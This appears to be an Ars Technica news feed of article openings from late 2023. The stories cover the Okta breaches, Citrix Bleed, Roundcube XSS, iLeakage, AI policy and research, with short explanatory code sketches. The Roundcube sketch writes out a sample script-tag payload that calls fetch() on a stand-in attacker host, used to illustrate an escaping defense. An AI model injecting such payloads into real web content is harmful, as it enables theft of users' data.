Biz & IT – Ars Technica | https://arstechnica.com
Serving the Technologist for more than a decade. IT news, reviews, and analysis.
Last updated: Sat, 04 Nov 2023 18:32:57 +0000

No, Okta, senior management, not an errant employee, caused you to get hacked
https://arstechnica.com/information-technology/2023/11/no-okta-senior-management-not-an-errant-employee-caused-you-to-get-hacked/ | Sat, 04 Nov 2023 00:31:12 +0000

(credit: Omar Marques/SOPA Images/LightRocket via Getty Images)

Identity and authentication management provider Okta on Friday published an autopsy report on a recent breach that gave hackers administrative access to the Okta accounts of some of its customers. While the postmortem emphasizes the transgressions of an employee logging into a personal Google account on a work device, the biggest contributing factor was something the company understated: a badly configured service account.

In a post, Okta Chief Security Officer David Bradbury said the threat actor behind the attack most likely gained access to parts of his company’s customer support system by first compromising an employee’s personal device or personal Google account and, from there, obtaining the username and password for a service account, a special form of account used for connecting to the support segment of the Okta network. Once the threat actor had access, they could obtain administrative credentials for entering the Okta accounts belonging to 1Password, BeyondTrust, Cloudflare, and other Okta customers.

Passing the buck

“During our investigation into suspicious use of this account, Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop,” Bradbury wrote. “The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.”

Okta hit by another breach, this one stealing employee data from 3rd-party vendor
https://arstechnica.com/security/2023/11/okta-hit-by-another-breach-this-one-stealing-employee-data-from-3rd-party-vendor/ | Thu, 02 Nov 2023 21:41:41 +0000

(credit: Getty Images)

Identity and authentication management provider Okta has been hit by another breach, this one against a third-party vendor that allowed hackers to steal personal information for 5,000 Okta employees.

The compromise was carried out in late September against Rightway Healthcare, a service Okta uses to support employees and their dependents in finding health care providers and plan rates. An unidentified threat actor gained access to Rightway’s network and made off with an eligibility census file the vendor maintained on behalf of Okta. Okta learned of the compromise and data theft on October 12 and didn’t disclose it until Thursday, exactly three weeks later.

“The types of personal information contained in the impacted eligibility census file included your Name, Social Security Number, and health or medical insurance plan number,” a letter sent to affected Okta employees stated. “We have no evidence to suggest that your personal information has been misused against you.”

This tiny device is sending updated iPhones into a never-ending DoS loop
https://arstechnica.com/security/2023/11/flipper-zero-gadget-that-doses-iphones-takes-once-esoteric-attacks-mainstream/ | Thu, 02 Nov 2023 11:15:24 +0000
A fully updated iPhone (left) after being force crashed by a Flipper Zero (right). (credit: Jeroen van der Ham)

One morning two weeks ago, security researcher Jeroen van der Ham was traveling by train in the Netherlands when his iPhone suddenly displayed a series of pop-up windows that made it nearly impossible to use his device.

“My phone was getting these popups every few minutes and then my phone would reboot,” he wrote to Ars in an online interview. “I tried putting it in lock down mode, but it didn't help.”

To van der Ham’s surprise and chagrin, the same debilitating stream of pop-ups hit again on the afternoon commute home, not just on his iPhone but on the iPhones of other passengers in the same train car. He then noticed that one nearby passenger had also been present that morning. Van der Ham put two and two together and fingered that passenger as the culprit.

“Catastrophic” AI harms among warnings in declaration signed by 28 nations
https://arstechnica.com/information-technology/2023/11/catastrophic-ai-harms-among-warnings-in-declaration-signed-by-28-nations/ | Wed, 01 Nov 2023 21:21:46 +0000
UK Technology Secretary Michelle Donelan (front row center) is joined by international counterparts for a group photo at the AI Safety Summit at Bletchley Park in Milton Keynes, Buckinghamshire, on November 1, 2023. (credit: Getty Images)

On Wednesday, the UK hosted an AI Safety Summit attended by 28 countries, including the US and China, which gathered to address potential risks posed by advanced AI systems, reports The New York Times. The event included the signing of "The Bletchley Declaration," which warns of potential harm from advanced AI and calls for international cooperation to ensure responsible AI deployment.

"There is potential for serious, even catastrophic, harm, either deliberate or unintentional, stemming from the most significant capabilities of these AI models," reads the declaration, named after Bletchley Park, the site of the summit and a historic World War II location linked to Alan Turing. Turing wrote influential early speculation about thinking machines.

Rapid advancements in machine learning, including the appearance of chatbots like ChatGPT, have prompted governments worldwide to consider regulating AI. Their concerns led to the meeting, which has drawn criticism for its invitation list. In the tech world, representatives from major companies included those from Anthropic, Google DeepMind, IBM, Meta, Microsoft, Nvidia, OpenAI, and Tencent. Civil society groups, like Britain's Ada Lovelace Institute and the Algorithmic Justice League in Massachusetts, also sent representatives.

Inserted AI-generated Microsoft poll about woman’s death rankles The Guardian
https://arstechnica.com/information-technology/2023/10/inserted-ai-generated-microsoft-poll-about-womans-death-rankles-the-guardian/ | Tue, 31 Oct 2023 19:53:37 +0000
Illustration of robot hands using a typewriter. (credit: Getty Images)

On Tuesday, The Guardian accused Microsoft of damaging its journalistic reputation by publishing an AI-generated poll beside one of its articles on the Microsoft Start website. The poll, created by an AI model on Microsoft's news platform, speculated on the cause of a woman's death, reportedly triggering reader anger and leading to reputational concerns for the news organization.

"This has to be the most pathetic, disgusting poll I’ve ever seen," wrote one commenter on the story. The comment section has since been disabled.

The poll appeared beside a republished Guardian story about Lilie James, a 21-year-old water polo coach who was found dead with head injuries in Sydney. The AI-generated poll presented readers with three choices to speculate on the cause of James' death: murder, accident, or suicide. Following negative reactions, the poll was removed, but critical comments remained visible for a time before their removal.

Windows CE, Microsoft’s stunted middle child, reaches end of support at 26 years
https://arstechnica.com/gadgets/2023/10/windows-ce-microsofts-stunted-middle-child-reaches-end-of-support-at-26-years/ | Mon, 30 Oct 2023 21:46:11 +0000
Man in sleeveless T-shirt, standing with a shovel over the misty red grave of the Windows CE logo. (credit: Aurich Lawson | Getty Images)

It was a proto-netbook. It was a palmtop. It was a PDA. It was Windows Phone 7 but not Windows Phone 8, and then it was an embedded ghost. Its parents never seemed to know what to do with it after it grew up, beyond offering it up for anybody to shape in their own image. And then, earlier this month, with little notice, Windows CE was no more, at least as a supported operating system. Windows Embedded Compact 2013, or sometimes Windows CE 8.0, reached end of support on October 10, 2023, as noted by The Register.

Windows CE, which had a name that didn't stand for anything and was sometimes rendered as "wince," is not survived by anything, really. Remembrances have been offered by every Microsoft CEO since its inception and one former Ars writer. A public service for the operating system will be held in the comments.

The OS that fit in small spaces

Windows CE began as Microsoft Pegasus, a project team working to create a very low-power MIPS- or SuperH-based reference platform for manufacturers making the smallest computers with keyboards you could make back then. Devices like the NEC MobilePro 200, Casio (Cassiopeia) A-10, and HP 300LX started appearing in late 1996 and early 1997, with tiny keyboards, more-landscape-than-landscape displays, and, by modern standards, an impressive number of ports.

“This vulnerability is now under mass exploitation.” Citrix Bleed bug bites hard
https://arstechnica.com/security/2023/10/critical-citrix-bleed-vulnerability-allowing-mfa-bypass-comes-under-mass-exploitation/ | Mon, 30 Oct 2023 21:39:07 +0000

(credit: Getty Images)

A vulnerability that allows attackers to bypass multifactor authentication and access enterprise networks using hardware sold by Citrix is under mass exploitation by ransomware hackers despite a patch being available for three weeks.

Citrix Bleed, the common name for the vulnerability, carries a severity rating of 9.4 out of a possible 10, a relatively high designation for a mere information-disclosure bug. The reason: the information disclosed can include session tokens, which the hardware assigns to devices that have already successfully provided credentials, including those providing MFA. The vulnerability, tracked as CVE-2023-4966 and residing in Citrix’s NetScaler Application Delivery Controller and NetScaler Gateway, has been under active exploitation since August. Citrix issued a patch on October 10.
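To see why a stolen session token defeats MFA, consider a minimal sketch of token-based session handling. This is hypothetical, simplified Python, not Citrix code: the point is that a token is minted only after the password and MFA checks pass, and every later request is authorized by the token alone, so whoever holds a leaked token never faces those checks.

```python
# Hypothetical sketch: why leaked session tokens bypass MFA.
import secrets

SESSIONS = {}  # token -> username; populated only after MFA succeeds

def login(username, password_ok, mfa_ok):
    """Mint a session token only when both factors check out."""
    if password_ok and mfa_ok:
        token = secrets.token_hex(16)
        SESSIONS[token] = username
        return token
    return None

def handle_request(token):
    # The server never re-checks the password or MFA here; possession
    # of a valid token is the entire proof of identity.
    user = SESSIONS.get(token)
    return f"200 OK, acting as {user}" if user else "401 Unauthorized"

victim_token = login("alice", password_ok=True, mfa_ok=True)
# An attacker who reads this token out of leaked memory needs no credentials:
print(handle_request(victim_token))
```

An information-disclosure bug that exposes the contents of `SESSIONS` (or the memory holding a live token, as with Citrix Bleed) therefore hands over fully authenticated access.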

Repeat: This is not a drill

Attacks have only ramped up recently, prompting security researcher Kevin Beaumont on Saturday to declare: “This vulnerability is now under mass exploitation.” He went on to say, “From talking to multiple organizations, they are seeing widespread exploitation.”

Biden issues sweeping executive order that touches AI risk, deepfakes, privacy
https://arstechnica.com/information-technology/2023/10/biden-ai-executive-order-requires-safety-testing-for-ai-that-poses-serious-risk/ | Mon, 30 Oct 2023 16:43:55 +0000

(credit: Aurich Lawson | Getty Images)

On Monday, President Joe Biden issued an executive order on AI that outlines the federal government's first comprehensive regulations on generative AI systems. The order includes testing mandates for advanced AI models to ensure they can't be used for creating weapons, suggestions for watermarking AI-generated media, and provisions addressing privacy and job displacement.

In the United States, an executive order allows the president to manage and operate the federal government. Using his authority to set terms for government contracts, Biden aims to influence AI standards by stipulating that federal agencies may only enter into contracts with companies that comply with the government's newly outlined AI regulations, leveraging the federal government's purchasing power to drive compliance with the new standards.

As of press time Monday, the White House had not yet released the full text of the executive order, but from the Fact Sheet authored by the administration and through reporting on drafts of the order by Politico and The New York Times, we can piece together a picture of its contents. Some parts of the order reflect positions first specified in Biden's 2022 "AI Bill of Rights" guidelines, which we covered last October.

Microsoft profiles new threat group with unusual but effective practices
https://arstechnica.com/security/2023/10/microsoft-profiles-new-threat-group-with-unusual-but-effective-practices/ | Fri, 27 Oct 2023 23:20:36 +0000
This is not what a hacker looks like. Except on hacker cosplay night. (credit: Getty Images | Bill Hinton)

Microsoft has been tracking a threat group that stands out for its ability to cash in on data theft hacks through broad social engineering attacks, painstaking research, and occasional physical threats.

Unlike many ransomware attack groups, Octo Tempest, as Microsoft has named the group, doesn’t encrypt data after gaining illegal access to it. Instead, the threat actor threatens to share the data publicly unless the victim pays a hefty ransom. To defeat targets’ defenses, the group resorts to a host of techniques, which, besides social engineering, include SIM swaps, SMS phishing, and live voice calls. Over time, the group has grown increasingly aggressive, at times resorting to threats of physical violence if a target doesn’t comply with instructions to turn over credentials.

“In rare instances, Octo Tempest resorts to fear-mongering tactics, targeting specific individuals through phone calls and texts,” Microsoft researchers wrote in a post on Wednesday. “These actors use personal information, such as home addresses and family names, along with physical threats to coerce victims into sharing credentials for corporate access.”

People are speaking with ChatGPT for hours, bringing 2013’s Her closer to reality
https://arstechnica.com/information-technology/2023/10/people-are-speaking-with-chatgpt-for-hours-bringing-2013s-her-closer-to-reality/ | Fri, 27 Oct 2023 16:52:55 +0000
Joaquin Phoenix talking with AI in Her (2013). (credit: Warner Bros.)

In 2013, Spike Jonze's Her imagined a world where humans form deep emotional connections with AI, challenging perceptions of love and loneliness. Ten years later, thanks to ChatGPT's recently added voice features, people are playing out a small slice of Her in reality, having hours-long discussions with the AI assistant on the go.

In 2016, we put Her on our list of top sci-fi films of all time, and it also made our top films of the 2010s list. In the film, Joaquin Phoenix's character falls in love with an AI personality called Samantha (voiced by Scarlett Johansson), and he spends much of the film walking through life, talking to her through wireless earbuds reminiscent of Apple AirPods, which launched in 2016. In reality, ChatGPT isn't as situationally aware as Samantha was in the film, it does not have long-term memory, and OpenAI has conditioned ChatGPT enough to keep conversations from getting too intimate or personal. But that hasn't stopped people from having long talks with the AI assistant to pass the time anyway.

Last week, we related a story in which AI researcher Simon Willison spent a long time talking to ChatGPT verbally. "I had an hourlong conversation while walking my dog the other day," he told Ars for that report. "At one point, I thought I'd turned it off, and I saw a pelican, and I said to my dog, 'Oh, wow, a pelican!' And my AirPod went, 'A pelican, huh? That's so exciting for you! What's it doing?' I've never felt so deeply like I'm living out the first ten minutes of some dystopian sci-fi movie."

iPhones have been exposing your unique MAC despite Apple’s promises otherwise
https://arstechnica.com/security/2023/10/iphone-privacy-feature-hiding-wi-fi-macs-has-failed-to-work-for-3-years/ | Thu, 26 Oct 2023 21:48:04 +0000
Private Wi-Fi address setting on an iPhone. (credit: Apple)

Three years ago, Apple introduced a privacy-enhancing feature that hid the Wi-Fi address of iPhones and iPads when they joined a network. On Wednesday, the world learned that the feature has never worked as advertised. Despite promises that this never-changing address would be hidden and replaced with a private one that was unique to each SSID, Apple devices have continued to display the real one, which in turn got broadcast to every other connected device on the network.

The problem is that a Wi-Fi media access control address—typically called a MAC address or simply a MAC—can be used to track individuals from network to network, in much the way a license plate number can be used to track a vehicle as it moves around a city. Case in point: In 2013, a researcher unveiled a proof-of-concept device that logged the MAC of all devices it came into contact with. The idea was to distribute lots of them throughout a neighborhood or city and build a profile of iPhone users, including the social media sites they visited and the many locations they visited each day.

In the decade since, HTTPS-encrypted communications have become standard, so people on the same network generally can't monitor other people's traffic. Still, a permanent MAC provides plenty of trackability, even now.
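What a feature like Apple's is supposed to do, present a different but stable address to each network, can be sketched in a few lines. This is an illustration of the concept only; Apple's actual derivation is not public here, and the `private_mac` function below is hypothetical.

```python
# Concept sketch of per-network MAC randomization (not Apple's algorithm):
# derive a stable, locally administered MAC from a device secret + SSID,
# so each network sees a different address but the same one on rejoin.
import hashlib

def private_mac(device_secret: bytes, ssid: str) -> str:
    digest = hashlib.sha256(device_secret + ssid.encode()).digest()
    octets = bytearray(digest[:6])
    # Set the "locally administered" bit, clear the multicast bit,
    # so the result is a valid unicast address that can't collide
    # with a manufacturer-assigned MAC.
    octets[0] = (octets[0] | 0x02) & 0xFE
    return ":".join(f"{b:02x}" for b in octets)

secret = b"per-device secret kept on the phone"
print(private_mac(secret, "CoffeeShopWiFi"))  # differs per SSID
print(private_mac(secret, "HomeNet"))         # stable on every rejoin
```

The bug Ars describes is that, despite this kind of address being shown in settings, the hardware MAC still leaked to the network through other protocol traffic.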

Pro-Russia hackers target inboxes with 0-day in webmail app used by millions
https://arstechnica.com/security/2023/10/pro-russia-hackers-target-inboxes-with-0-day-in-webmail-app-used-by-millions/ | Wed, 25 Oct 2023 22:21:49 +0000

(credit: Getty Images)

A relentless team of pro-Russia hackers has been exploiting a zero-day vulnerability in widely used webmail software in attacks targeting governmental entities and a think tank, all in Europe, researchers from security firm ESET said on Wednesday.

The previously unknown vulnerability resulted from a critical cross-site scripting error in Roundcube, a server application used by more than 1,000 webmail services and millions of their end users. Members of a hacking group aligned with Russia and Belarus, tracked as Winter Vivern, used the XSS bug to inject JavaScript into the Roundcube server application. The injection was triggered simply by viewing a malicious email, which caused the server to send emails from selected targets to a server controlled by the threat actor.

No manual interaction required

“In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window,” ESET researcher Matthieu Faou wrote. “No manual interaction other than viewing the message in a web browser is required.”
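The underlying failure, untrusted email HTML reaching the browser with its script intact, has a classic remedy: neutralize markup before rendering it. The sketch below is illustrative Python, not Roundcube's actual code or patch; the attacker URL is made up.

```python
# Sketch of the defense against stored XSS in a webmail renderer:
# escape untrusted email HTML so markup becomes inert text.
import html

# A hostile message body (hypothetical payload and domain):
malicious_email_body = '<svg><script>fetch("https://attacker.example/steal")</script></svg>'

def render_untrusted(fragment: str) -> str:
    # After escaping, "<script>" arrives in the browser as the literal
    # text "&lt;script&gt;", so merely viewing the message can no longer
    # execute attacker JavaScript.
    return html.escape(fragment)

safe = render_untrusted(malicious_email_body)
print(safe)
```

Real webmail clients need richer sanitization than blanket escaping (they must allow benign HTML while stripping active content), which is exactly the kind of filtering the Roundcube bug slipped past.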

University of Chicago researchers seek to “poison” AI art generators with Nightshade
https://arstechnica.com/information-technology/2023/10/university-of-chicago-researchers-seek-to-poison-ai-art-generators-with-nightshade/ | Wed, 25 Oct 2023 21:21:23 +0000
Robotic arm holding a dangerous chemical. (credit: Getty Images)

On Friday, a team of researchers at the University of Chicago released a research paper outlining "Nightshade," a data poisoning technique aimed at disrupting the training process for AI models, report MIT Technology Review and VentureBeat. The goal is to help visual artists and publishers protect their work from being used to train generative AI image synthesis models, such as Midjourney, DALL-E 3, and Stable Diffusion.

The open source "poison pill" tool (as the University of Chicago's press department calls it) alters images in ways invisible to the human eye that can corrupt an AI model's training process. Many image synthesis models, with the notable exceptions of those from Adobe and Getty Images, largely use data sets of images scraped from the web without artist permission, which includes copyrighted material. (OpenAI licenses some of its DALL-E training images from Shutterstock.)
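The core idea, an alteration too small to see but present in every pixel a model trains on, can be shown with a toy sketch. This is hypothetical and far simpler than Nightshade, which optimizes its perturbations toward a chosen target concept; here random noise merely stands in for that crafted signal.

```python
# Conceptual sketch of training-data poisoning (not the Nightshade
# algorithm): nudge pixel values within a tiny budget so the image
# looks unchanged to a person while its numeric features shift.
import random

random.seed(0)
WIDTH = HEIGHT = 8
image = [[random.random() for _ in range(WIDTH)] for _ in range(HEIGHT)]

EPS = 4 / 255  # perturbation budget; per-pixel changes this small are ~invisible

def poison(img, eps):
    # In a real attack the perturbation is optimized to resemble a
    # *different* concept than the image's caption describes.
    return [[min(1.0, max(0.0, px + random.uniform(-eps, eps)))
             for px in row] for row in img]

poisoned = poison(image, EPS)
max_change = max(abs(a - b) for ra, rb in zip(image, poisoned)
                 for a, b in zip(ra, rb))
print(f"max per-pixel change: {max_change:.4f}")  # always within EPS
```

A model trained on enough images altered this way (with optimized rather than random noise) learns a skewed association between the artwork's style and the attacker's chosen concept.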

AI researchers' reliance on commandeered data scraped from the web, which many see as ethically fraught, has also been key to the recent explosion in generative AI capability. It took an entire Internet of images with annotations (through captions, alt text, and metadata) created by millions of people to assemble a data set with enough variety to train Stable Diffusion, for example. Hiring people to annotate hundreds of millions of images would be impractical in both cost and time. Those with access to existing large image databases (such as Getty and Shutterstock) are at an advantage when using licensed training data.

Apple backs national right-to-repair bill, offering parts, manuals, and tools
https://arstechnica.com/gadgets/2023/10/apple-backs-national-right-to-repair-bill-offering-parts-manuals-and-tools/ | Wed, 25 Oct 2023 19:19:31 +0000
A section of Apple's repair manual for the M2 MacBook Air from 2022. Apple already offers customers some repair manuals and parts through its Self-Service Repair program. (credit: Apple)

Right-to-repair advocates have long stated that passing repair laws in individual states was worth the uphill battle. Once enough states demanded that manufacturers make parts, repair guides, and diagnostic tools available, few companies would want to differentiate their offerings and policies and would instead pivot to national availability.

On Tuesday, Apple did exactly that. Following the passage of California's repair bill, which Apple supported and which requires seven years of parts, specialty tools, and repair manual availability, the company announced that it would back a similar bill at the federal level. It would also make its parts, tools, and repair documentation available to both non-affiliated repair shops and individual customers, "at fair and reasonable prices."

"We intend to honor California's new repair provisions across the United States," said Brian Naumann, Apple's vice president for service and operation management, at a White House event Tuesday.

Hackers can force iOS and macOS browsers to divulge passwords and much more
https://arstechnica.com/security/2023/10/hackers-can-force-ios-and-macos-browsers-to-divulge-passwords-and-a-whole-lot-more/ | Wed, 25 Oct 2023 17:00:39 +0000

(credit: Kim et al.)

Researchers have devised an attack that forces Apple’s Safari browser to divulge passwords, Gmail message content, and other secrets by exploiting a side channel vulnerability in the A- and M-series CPUs running modern iOS and macOS devices.

iLeakage, as the academic researchers have named the attack, is practical and requires minimal resources to carry out. It does, however, require extensive reverse-engineering of Apple hardware and significant expertise in exploiting a class of vulnerability known as a side channel, which leaks secrets based on clues left in electromagnetic emanations, data caches, or other manifestations of a targeted system. The side channel in this case is speculative execution, a performance enhancement feature found in modern CPUs that has formed the basis of a wide corpus of attacks in recent years. The nearly endless stream of exploit variants has left chip makers—primarily Intel and, to a lesser extent, AMD—scrambling to devise mitigations.

Exploiting WebKit on Apple silicon

The researchers implement iLeakage as a website. When visited by a vulnerable macOS or iOS device, the website uses JavaScript to surreptitiously open a separate website of the attacker’s choice and recover site content rendered in a pop-up window. The researchers have successfully leveraged iLeakage to recover YouTube viewing history, the content of a Gmail inbox—when a target is logged in—and a password as it’s being autofilled by a credential manager. (In an email sent five days after this post went live, a Google representative pointed out the obvious: the leakage is the result of the side-channel and WebKit behavior and Gmail is simply a hypothetical downstream target. There are no indications iLeakage has been exploited in the wild.)

“Do not open robots,” warns Oregon State amid college food delivery bomb prank
https://arstechnica.com/information-technology/2023/10/do-not-open-robots-warns-oregon-state-amid-college-food-delivery-bomb-prank/ | Wed, 25 Oct 2023 15:14:20 +0000
A 2020 file photo of a Starship Technologies food delivery robot. Food is stored inside the robot's housing during transportation and opened upon delivery. (credit: Leon Neal/Getty Images)

On Tuesday, officials at Oregon State University issued a warning on social media about a bomb threat concerning Starship Technologies food delivery robots, autonomous wheeled drones that deliver food orders stored within a built-in container. By 7 pm local time, a suspect had been arrested in the prank, and officials declared there had been no bombs hidden within the robots.

"Bomb Threat in Starship food delivery robots," reads the 12:20 pm initial X post from OSU. "Do not open robots. Avoid all robots until further notice." In follow-up posts, OSU officials said they were "remotely isolating robots in a safe location" for investigation by a technician. By 3:54 pm local time, experts had cleared the robots and promised they would be "back in service" by 4 pm.

In response, Starship Technologies provided this statement to the press: "A student at Oregon State University sent a bomb threat, via social media, that involved Starship’s robots on the campus. While the student has subsequently stated this is a joke and a prank, Starship suspended the service. Safety is of the utmost importance to Starship and we are cooperating with law enforcement and the university during this investigation."

US surprises Nvidia by speeding up new AI chip export ban
https://arstechnica.com/information-technology/2023/10/ai-chip-wars-us-curbs-nvidia-gpu-chip-exports-sooner-than-expected/ | Tue, 24 Oct 2023 21:07:12 +0000
A press photo of the Nvidia H100 Tensor Core GPU. (credit: Nvidia)

On Tuesday, chip designer Nvidia announced in an SEC filing that new US export restrictions on its high-end AI GPU chips to China took effect sooner than expected, according to a report from Reuters. The curbs, designed to prevent China, Iran, and Russia from acquiring advanced AI chips, were initially scheduled to take effect 30 days after their announcement on October 17.

The banned chips are advanced graphics processing units (GPUs) that are commonly used for training and running deep learning AI applications similar to ChatGPT and AI image generators, among other uses. GPUs are well-suited for neural networks because their massively parallel architecture performs the necessary matrix multiplications involved in running neural networks faster than conventional processors.
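The matrix multiplication at the heart of a neural network layer looks like the sketch below: plain Python standing in for the operation GPUs parallelize, since every output element depends only on one row and one column and can be computed independently. (Real workloads run millions of far larger multiplications; the sizes here are illustrative.)

```python
# Why GPUs suit neural nets: a layer's forward pass is a matrix multiply,
# and each output element below can be computed independently, in parallel.
def matmul(A, B):
    rows, inner, cols = len(A), len(B), len(B[0])
    # C[i][j] depends only on row i of A and column j of B, so all
    # rows*cols dot products can run at the same time on a GPU.
    return [[sum(A[i][k] * B[k][j] for k in range(inner))
             for j in range(cols)] for i in range(rows)]

activations = [[1.0, 2.0]]          # batch of 1, two input features
weights = [[0.5, -1.0, 0.0],        # 2x3 weight matrix: two inputs -> three units
           [0.25, 0.75, 1.0]]
print(matmul(activations, weights))  # [[1.0, 0.5, 2.0]]
```

The export rules target chips whose throughput on exactly this kind of operation crosses a performance threshold.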

The Biden administration initially announced an advanced AI chip export ban in September 2022, and in response, Nvidia designed and released new chips, the A800 and H800, to comply with those export rules for the Chinese market. In November 2022, Nvidia told The Verge that the A800 "meets the US Government’s clear test for reduced export control and cannot be programmed to exceed it." However, the new curbs enacted Monday specifically halt exports of these modified Nvidia AI chips. The Nvidia A100, H100, and L40S chips are also covered by the export restrictions.

1Password detects “suspicious activity” in its internal Okta account https://arstechnica.com/?p=1978094 https://arstechnica.com/security/2023/10/1password-detects-suspicious-activity-in-its-internal-okta-account/#comments Mon, 23 Oct 2023 20:56:49 +0000 https://arstechnica.com/?p=1978094
(credit: 1Password)

1Password, a password manager used by millions of people and more than 100,000 businesses, said it detected suspicious activity on a company account provided by Okta, the identity and authentication service that disclosed a breach on Friday.

“On September 29, we detected suspicious activity on our Okta instance that we use to manage our employee-facing apps,” 1Password CTO Pedro Canahuati wrote in an email. “We immediately terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.”

Since then, Canahuati said, his company has been working with Okta to determine how the unknown attacker gained access to the account. On Friday, investigators confirmed that the activity resulted from the breach of Okta's customer support management system that Okta disclosed the same day.

Stanford researchers challenge OpenAI, others over AI transparency in new report https://arstechnica.com/?p=1977869 https://arstechnica.com/information-technology/2023/10/stanford-researchers-challenge-openai-others-on-ai-transparency-in-new-report/#comments Mon, 23 Oct 2023 19:59:50 +0000 https://arstechnica.com/?p=1977869
(credit: Getty Images / Benj Edwards)

On Wednesday, Stanford University researchers issued a report on major AI models and found them greatly lacking in transparency, reports Reuters. The report, called "The Foundation Model Transparency Index," examined models (such as GPT-4) created by OpenAI, Google, Meta, Anthropic, and others. It aims to shed light on the data and human labor used in training the models, calling for increased disclosure from companies.

Foundation models are AI systems trained on large datasets and capable of performing a wide range of tasks, from writing text to generating images. They've become key to the rise of generative AI technology, particularly since the launch of OpenAI's ChatGPT in November 2022. As businesses and organizations increasingly incorporate these models into their operations, fine-tuning them for their own needs, the researchers argue that understanding their limitations and biases has become essential.

"Less transparency makes it harder for other businesses to know if they can safely build applications that rely on commercial foundation models; for academics to rely on commercial foundation models for research; for policymakers to design meaningful policies to rein in this powerful technology; and for consumers to understand model limitations or seek redress for harms caused," writes Stanford in a news release.

Eureka: With GPT-4 overseeing training, robots can learn much faster https://arstechnica.com/?p=1977747 https://arstechnica.com/information-technology/2023/10/eureka-uses-gpt-4-and-massively-parallel-simulations-to-accelerate-robot-training/#comments Mon, 23 Oct 2023 13:37:56 +0000 https://arstechnica.com/?p=1977747
In this still captured from a video provided by Nvidia, a simulated robot hand learns pen tricks, trained by Eureka, using simultaneous trials. (credit: Nvidia)

On Friday, researchers from Nvidia, UPenn, Caltech, and the University of Texas at Austin announced Eureka, an algorithm that uses OpenAI's GPT-4 language model for designing training goals (called "reward functions") to enhance robot dexterity. The work aims to bridge the gap between high-level reasoning and low-level motor control, allowing robots to learn complex tasks rapidly using massively parallel simulations that run through trials simultaneously. According to the team, Eureka outperforms human-written reward functions by a substantial margin.

Before robots can interact with the real world successfully, they need to learn how to move their bodies to achieve goals, such as picking up objects or walking. Instead of having a physical robot learn in a lab by trying and failing at one task at a time, researchers at Nvidia have been experimenting with video game-like computer worlds (via platforms called Isaac Sim and Isaac Gym) that simulate three-dimensional physics. These allow massively parallel training sessions to take place in many virtual worlds at once, dramatically speeding up training time.

"Leveraging state-of-the-art GPU-accelerated simulation in Nvidia Isaac Gym," writes Nvidia on its demonstration page, "Eureka is able to quickly evaluate the quality of a large batch of reward candidates, enabling scalable search in the reward function space." They call it "rapid reward evaluation via massively parallel reinforcement learning."
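The loop the researchers describe can be sketched in ordinary Python. Everything below is an illustrative stand-in, not Nvidia's implementation: `llm_propose_rewards` plays the role of GPT-4 proposing candidate reward functions, and `train_in_simulation` stands in for scoring each candidate with parallel reinforcement learning in a simulator.

```python
import random

def llm_propose_rewards(feedback, n=4):
    """Stand-in for GPT-4: mutate the best reward weighting so far into
    n new candidates. (Eureka has the model write actual reward *code*;
    simple numeric weightings keep this sketch runnable.)"""
    base = feedback or {"distance": 1.0, "smoothness": 0.0}
    rng = random.Random(len(str(feedback)))  # deterministic per round
    return [
        {k: v + rng.uniform(-0.5, 0.5) for k, v in base.items()}
        for _ in range(n)
    ]

def train_in_simulation(weights):
    """Stand-in for parallel RL training: returns a score, higher is
    better. This toy 'task' secretly prefers distance=2.0, smoothness=0.5."""
    target = {"distance": 2.0, "smoothness": 0.5}
    return -sum((weights[k] - target[k]) ** 2 for k in target)

# Evolutionary search: propose, evaluate, keep the best, repeat.
best, best_score = None, float("-inf")
for _ in range(5):
    for candidate in llm_propose_rewards(best):
        score = train_in_simulation(candidate)
        if score > best_score:
            best, best_score = candidate, score
```

In the real system, each candidate is a full reward function written as code, every candidate is scored by training thousands of simulated environments in parallel, and summary statistics from those runs are fed back into the next GPT-4 prompt so the proposals improve round over round.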
